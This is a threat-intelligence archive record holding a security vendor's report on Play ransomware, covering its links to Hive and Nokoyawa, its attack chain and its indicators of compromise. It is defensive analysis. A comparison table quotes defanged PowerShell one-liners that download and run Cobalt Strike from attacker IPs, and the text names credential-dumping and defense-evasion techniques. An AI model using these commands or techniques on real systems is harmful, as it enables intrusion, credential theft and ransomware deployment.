{
	"id": "b02ca1ff-84ff-48f2-a9d9-59c315d8139f",
	"created_at": "2026-04-06T00:12:41.814602Z",
	"updated_at": "2026-04-10T13:12:25.965225Z",
	"deleted_at": null,
	"sha1_hash": "998a0cb68372b309ce8c32cce2a5034f4c6053d7",
	"title": "Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 295199,
	"plain_text": "Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa\r\nPublished: 2022-09-06 · Archived: 2026-04-05 16:49:24 UTC\r\nIn July, we investigated a spate of ransomwareopen on a new tab cases in the Latin American region that targeted\r\ngovernment entitles, which was initially attributed to a new player known as Play ransomware. This ransomware’s name was\r\nderived from its behavior, as it adds the extension “.play” after encrypting files. Its ransom note also contains the single\r\nword, “PLAY,” and the ransomware group’s contact email address (Figure 1). Victims of this ransomware first surfaced in\r\nBleeping Computer forumsopen on a new tab in June 2022. A month later, more details about Play ransomware were\r\npublished on the “No-logs No breach”open on a new tab website. \r\nFigure 1. Play ransomware’s ransom note\r\nFurther analysis of these ransomware infections, however, revealed that Play uses many tactics that follow the playbook of\r\nboth Hive and Nokoyawa ransomware (Tables 1 and 2), including similarities in the file names and file paths of their\r\nrespective tools and payloads. Earlier this year, we found evidence that suggests that the attackers behind Nokayawa are\r\nrelated to those behind Hiveopen on a new tab, owing to the many similarities between their attack chains.\r\nNotably, one behavior that sets Play ransomware apart from Hiveopen on a new tab and Nokoyawa is its use of AdFind, a\r\ncommand-line query tool capable of collecting information from Active Directory (AD), as means of discovery (Figure 2).\r\nHive, on the other hand, has been observed using tools like the TrojanSpy.DATASPYopen on a new tab trojan to gather\r\ninformation in a victim’s system.\r\nIndicator  Purpose\r\n  Nokoyawa and Hive\r\nransomware \r\n  Play\r\nransomware \r\nNekto/PriviCMD  Privilege escalation ✓ ✓\r\nCobalt Strike Staging  ✓ ✓\r\nCoroxy/SystemBC Remote access ✓ ✓\r\nGMER  Defense evasion ✓ ✓\r\nPCHunter  Discovery and defense evasion ✓  \r\nAdFind  Discovery    ✓\r\nPowerShell scripts Discovery ✓  \r\nPsExec \r\nLateral deployment of\r\nransomware ✓ ✓\r\nTable 1. A comparison of similarities in the overall flow and behavior of the Play and Nokoyawa/Hive ransomware families\r\n \r\nTactic/Tools  Nokoyawa and Hive ransomware  Play ransomware\r\nNekto/PriviCMD %public%\\Music\\svhost.exe %userprofile%\\Music\\t2747.exe\r\nCobalt Strike\r\ndownload\r\n-nop -w hidden -c \"IEX ((new-object\r\nnet.webclient).downloadstring('_hxxp://185.150.117[.]186:80/asdfgsdhsdfgsdfg'))\"\r\n-nop -w hidden -c \"IEX ((new-object\r\nnet.webclient).downloadstring('hxxp://8\r\nCoroxy/SystemBC %userprofile\\Pictures\\socks.exe\r\n%systemroot%\\System32\\sok.exe %public%\\Music\\soks.exe\r\nhttps://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html\r\nPage 1 of 6\n\nRansomware\r\ndeployment\r\nC:\\PerfLogs\\xxx.exe\r\n%mytemp%\\xxx.exe\r\nC:\\PerfLogs\\xxx.exe\r\n%mytemp%\\xxx.exe\r\nTargets Most targets are in Latin America Most targets are in Latin America\r\nTable 2. A comparison of tools and tactics in the attacks of Play and Nokoyawa/Hive ransomware families\r\nFigure 2. Play ransomware’s use of AdFind\r\nRelated Malware Campaigns\r\nThough not all of the Play ransomware infections that we analyzed shared malware indicators with that of Hive and\r\nNokoyawa ransomware, their many shared tactics and tools suggest a high probability of affiliation between these\r\nransomware families. This ransomware merits further investigation, and we plan on validating the related URLs from Play\r\nransomware infections in terms of watermarking. This is to determine whether these were indeed related to any Hive\r\ninfections in the past, as was done previously with Nokoyawa infections.\r\nAdditionally, we have found evidence that points to a possible connection between Play ransomware and Quantum\r\nransomwareopen on a new tab, which is an offshoot of the notorious Conti ransomware groupopen on a new tab. The Cobalt\r\nStrike beacons that were used in Play's attacks bear the same watermark, 206546002, as those previously dropped by Emotet\r\nand SVCReady botnets that have also been observed in Quantum ransomware attacks. This suggests that the two\r\nransomware groups share some of the same infrastructure.\r\nDuring our investigation, we found indicators of a good chance of an Emotet infection. Though there are currently no spam\r\ncampaigns using the Emotet trojan, we did detect a few cases of Emotet being used to deploy Cobalt Strike beacons bearing\r\nthe same 206546002 watermark that was found in beacons involved in Play's ransomware attacks.\r\nInfection Routine\r\nThe malware authors behind Play ransomware have been known to use compromised valid accounts or exploit unpatched\r\nFortinet SSL VPN vulnerabilities to gain access to an organization’s network (Figure 3). Like most modern ransomware,\r\nPlay uses living-off-the-land binaries (LOLBins) as part of its attacks: For example, it uses the remote tool WinSCP for data\r\nexfiltration, and Task Manager for Local Security Authority Server Service (LSASS) process dumping and credential\r\ncracking.\r\nPlay ransomware also uses double extortion techniques against its victims. In its attacks, data exfiltration is performed prior\r\nto the deployment of the ransomware: It archives a victim’s files using WinRAR and then uploads the files to sharing sites.\r\nThe ransomware executable is distributed via Group Policy Objects (GPO), then run using scheduled tasks, PsExec or wmic.\r\nhttps://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html\r\nPage 2 of 6\n\nFigure 3. Play ransomware’s infection chain\r\nInitial Access\r\nPlay’s ransomware actors commonly gain initial access through valid accounts that have been reused across multiple\r\nplatforms, have previously been exposed, or were obtained through illegal means. This includes Virtual Private Network\r\n(VPN) accounts, not just domain and local accounts. Exposed RDP servers are also abused to establish a foothold. Another\r\ntechnique Play ransomware uses is the exploitation of the FortiOS vulnerabilities CVE-2018-13379open on a new tab and\r\nCVE-2020-12812open on a new tab.\r\nCVE-2018-13379 is a path traversal vulnerability in the FortiOS SSL VPN web portal that allows an unauthenticated\r\nattacker to download OS system files through specially crafted HTTP resource requests.  On the other hand, CVE-2020-\r\n12812 is an improper-authentication vulnerability in SSL VPN in FortiOS, which allows a user to log in without being\r\nprompted for FortiToken, the second factor of authentication, if they changed the case of their username.\r\nExecution\r\nWe observed Play ransomware’s usage of scheduled tasks and PsExec during its execution phase. Another one of Play’s\r\ntechniques involves the creation of a GPO, as GPOs are able to control many user and machine settings in the AD. The GPO\r\ndeploys a scheduled task across the AD environment, and the task executes the ransomware at a specific date and time.  \r\nThe ransomware also uses batch files to execute PsExec, a legitimate Windows tool in the SysInternals suite. This tool’s\r\nability to execute processes on other systems allows the rapid spread of the ransomware and assists Play in its\r\nreconnaissance activities.\r\nPersistence\r\nAfter the Play ransomware actors gain initial access through valid accounts, they will continue to use these accounts as a\r\npersistence mechanism. If Remote Desktop Protocol (RDP) access is disabled in a victim’s system, the malicious actors will\r\nenable it by executing “netsh” commands so that they can establish inbound connections within a victim’s system. The\r\nransomware executable is dropped in the Domain Controller shared folders (NETLOGON or SYSVOL) and is run by a\r\nscheduled task/PsExec, after which encryption of the victim’s files takes place. \r\nPrivilege Escalation\r\nPlay ransomware uses Mimikatzopen on a new tab to extract high privileges credentials from memory. Afterward, the\r\nransomware will add accounts to privileged groups, one of which is the Domain Administrators group. It performs\r\nvulnerability enumeration through Windows Privilege Escalation Awesome Scriptsopen on a new tab (WinPEAS), a script\r\nthat searches for possible local privilege escalation paths.\r\nDefense Evasion\r\nThe ransomware uses tools such as Process Hackeropen on a new tab, GMERopen on a new tab, IOBit,open on a new tab\r\nand PowerToolopen on a new tab to disable antimalware and monitoring solutions. It covers its tracks using the Windows\r\nhttps://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html\r\nPage 3 of 6\n\nbuilt-in tool wevtutil or a batch script, which will remove indicators of its presence, such as logs in Windows Event Logs or\r\nmalicious files. It disables Windows Defender protection capabilities through PowerShell or command prompt. The\r\nPowerShell scripts that Play ransomware uses, like Cobalt Strike beacons (Cobeacon) or Empire agents, are encrypted in\r\nBase64.\r\nCredential Access\r\nPlay ransomware also uses Mimikatz to dump credentials. The tool can be dropped directly on the target host or executed as\r\na module through a command-and-control (C\u0026C) application like Empire or Cobalt Strike. We also observed the malware’s\r\nuse of the Windows tool Task Manager to dump the LSASS process from memory.\r\nDiscovery\r\nDuring the discovery phase, the ransomware actors collect more details about the AD environment. We’ve observed that AD\r\nqueries for remote systems have been performed by different tools, such as ADFindopen on a new tab, Microsoft Nltestopen\r\non a new tab, and Bloodhoundopen on a new tab. Enumeration of system information such as hostnames, shares, and\r\ndomain information were also performed by the threat actor.\r\nLateral Movement\r\nPlay ransomware may use different tools to move laterally across a victim’s system:\r\nCobalt Strike SMB beaconopen on a new tab is used as a C\u0026C beacon, a method of lateral movement, and a tool for\r\ndownloading and executing files\r\nSystemBCopen on a new tab, a SOCKS5 proxy bot that acts as a backdoor with the ability to communicate over\r\nTOR, is used for backdooring mechanisms\r\nEmpireopen on a new tab is an open-source post-exploitation framework used to conduct Play ransomware’s post-exploitation activity\r\nMimikatzopen on a new tab is used to dump credentials and gain domain administrator access on victim networks to\r\nconduct lateral movement. \r\nExfiltration\r\nA victim’s data is often split into chunks instead of whole files prior to its exfiltration, an approach that Play ransomware\r\nmay use to avoid triggering network data transfer. The ransomware actors use WinSCP, an SFTP client and FTP client for\r\nMicrosoft Windows. They also use WinRAR to compress the files in .RAR format for later exfiltration. We were able to\r\nidentify a web page developed in PHP that is used to receive the exfiltrated files.\r\nImpact\r\nAs mentioned earlier, after the ransomware encrypts a file, it adds the extension “.play” to that file. A ransom note,\r\nReadMe.txt, is created in the hard drive root (C:). In all the cases we investigated, the ransom notes contained an email\r\naddress following this format: [seven random characters]@gmx[.]com.  \r\nInfection Distribution\r\nLike Hive and Nokoyawa ransomware, most of Play ransomware’s attacks affected organizations located in the Latin\r\nAmerican region, with Brazil topping the list. Organizations in Argentina, Hungary, India, the Netherlands, and Spain also\r\nexperienced Play attacks. \r\nSecurity Recommendations\r\nThe results of our investigation into Play ransomware’s attacks highlight the evolution of threats that are designed to evade\r\ndetection. Organizations should be wary of malicious actors using red-team or penetration-testing tools to blend in with a\r\ntargeted system’s environment.\r\nEnd users and organizations alike can mitigate the risk of infection from ransomware like Play by following these security\r\nbest practices: \r\nEnable multifactor authentication (MFA) to prevent attackers from performing lateral movement inside a network.\r\nAdhere to the 3-2-1 ruleopen on a new tab when backing up important files. This involves creating three backup\r\ncopies on two different file formats, with one of the copies stored in a separate location. \r\nPatch and update systemsopen on a new tab regularly. It’s important to keep operating systems and applications up to\r\ndate and maintain patch management protocols that can deter malicious actors from exploiting any software\r\nvulnerabilities.\r\nUsers and organizations can benefit from the use of multilayered detection and response solutions such as Trend Micro\r\nVision One™open on a new tab, which provides powerful XDR capabilities that collect and automatically correlate data\r\nacross multiple security layers — email, endpoints, servers, cloud workloads, and networks — to prevent attacks via\r\nautomated protection, while also ensuring that no significant incidents go unnoticed. Trend Micro Apex One™open on a\r\nhttps://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html\r\nPage 4 of 6\n\nnew tab also provides next-level automated threat detection and response to protect endpoints against advanced issues, like\r\nhuman-operated ransomware. \r\nIndicators of Compromise (IOCs)\r\nHashes \r\nSHA-256 Detection Description\r\nfc2b98c4f03a246f6564cc778c03f1f9057510efb578ed3e9d8e8b0e5516bd49 Trojan.Win64.PRIVICMD.YXCHW PRIVICMD/NEKTO\r\nc316627897a78558356662a6c64621ae25c3c3893f4b363a4b3f27086246038d Backdoor.Win32.COBEACON.YXCH3 Cobalt Strike\r\nc92c158d7c37fea795114fa6491fe5f145ad2f8c08776b18ae79db811e8e36a3 PUA.Win32.AdFind.A AdFind\r\ne1c75f863749a522b244bfa09fb694b0cc2ae0048b4ab72cb74fcf73d971777b Trojan.BAT.ADFIND.YECGUT\r\nAdFind Command\r\nLines\r\n094d1476331d6f693f1d546b53f1c1a42863e6cde014e2ed655f3cbe63e5ecde HackTool.Win32.ToolPow.SM PowerTool\r\ne8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173 PUA.Win32.GMER.YABBI GMER\r\nd4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f PUA.Win32.ProcHack.C Process Hacker\r\nc88b284bac8cd639861c6f364808fac2594f0069208e756d2f66f943a23e3022 Backdoor.Win32.SYSTEMBC.YXCFLZ Coroxy/SystemBC\r\nf18bc899bcacd28aaa016d220ea8df4db540795e588f8887fe8ee9b697ef819f Ransom.Win32.PLAYCRYPT.YECGUT Play ransomware\r\ne641b622b1f180fe189e3f39b3466b16ca5040b5a1869e5d30c92cca5727d3f0 Ransom.Win32.PLAYDE.A Play ransomware\r\n608e2b023dc8f7e02ae2000fc7dbfc24e47807d1e4264cbd6bb5839c81f91934 Ransom.Win32.PLAYDE.YXCHJT Play ransomware\r\n006ae41910887f0811a3ba2868ef9576bbd265216554850112319af878f06e55 Ransom.Win32.PLAYDE.YXCHJT Play ransomware\r\ne4f32fe39ce7f9f293ccbfde30adfdc36caf7cfb6ccc396870527f45534b840b Ransom.Win32.PLAYDE.YXCHJT Play ransomware\r\n8962de34e5d63228d5ab037c87262e5b13bb9c17e73e5db7d6be4212d66f1c22 Ransom.Win32.PLAYDE.YXCHJT Play ransomware\r\n5573cbe13c0dbfd3d0e467b9907f3a89c1c133c774ada906ea256e228ae885d5 Ransom.Win32.PLAYDE.YXCHJT Play ransomware\r\nf6072ff57c1cfe74b88f521d70c524bcbbb60c561705e9febe033f51131be408 Ransom.Win32.PLAYDE.YXCHJT Play ransomware\r\n7d14b98cdc1b898bd0d9be80398fc59ab560e8c44e0a9dedac8ad4ece3d450b0 Ransom.Win32.PLAYDE.YXCHJT Play ransomware\r\ndcaf62ee4637397b2aaa73dbe41cfb514c71565f1d4770944c9b678cd2545087 Ransom.Win32.PLAYDE.YXCHJT Play ransomware\r\nf5c2391dbd7ebb28d36d7089ef04f1bd9d366a31e3902abed1755708207498c0 Ransom.Win32.PLAYDE.YACHWT Play ransomware\r\nhttps://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html\r\nPage 5 of 6\n\n3e6317229d122073f57264d6f69ae3e145decad3666ddad8173c942e80588e69 Ransom.Win32.PLAYDE.YACHP Play ransomware\r\nURLs\r\nURL Description\r\nhxxp://84.32.190[.]37:80/ahgffxvbghgfv Cobalt Strike download\r\nhxxp://newspraize[.]com Cobalt Strike C\u0026C\r\nhxxp://realmacnow[.]com Cobalt Strike C\u0026C\r\n172.67.176[.]244 Cobalt Strike C\u0026C\r\n104.21.43[.]80 Cobalt Strike C\u0026C\r\nhxxp://67.205.182[.]129/u2/upload[.]php Exfiltration C\u0026C Server\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html\r\nhttps://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html"
	],
	"report_names": [
		"play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434361,
	"ts_updated_at": 1775826745,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/998a0cb68372b309ce8c32cce2a5034f4c6053d7.pdf",
		"text": "https://archive.orkl.eu/998a0cb68372b309ce8c32cce2a5034f4c6053d7.txt",
		"img": "https://archive.orkl.eu/998a0cb68372b309ce8c32cce2a5034f4c6053d7.jpg"
	}
}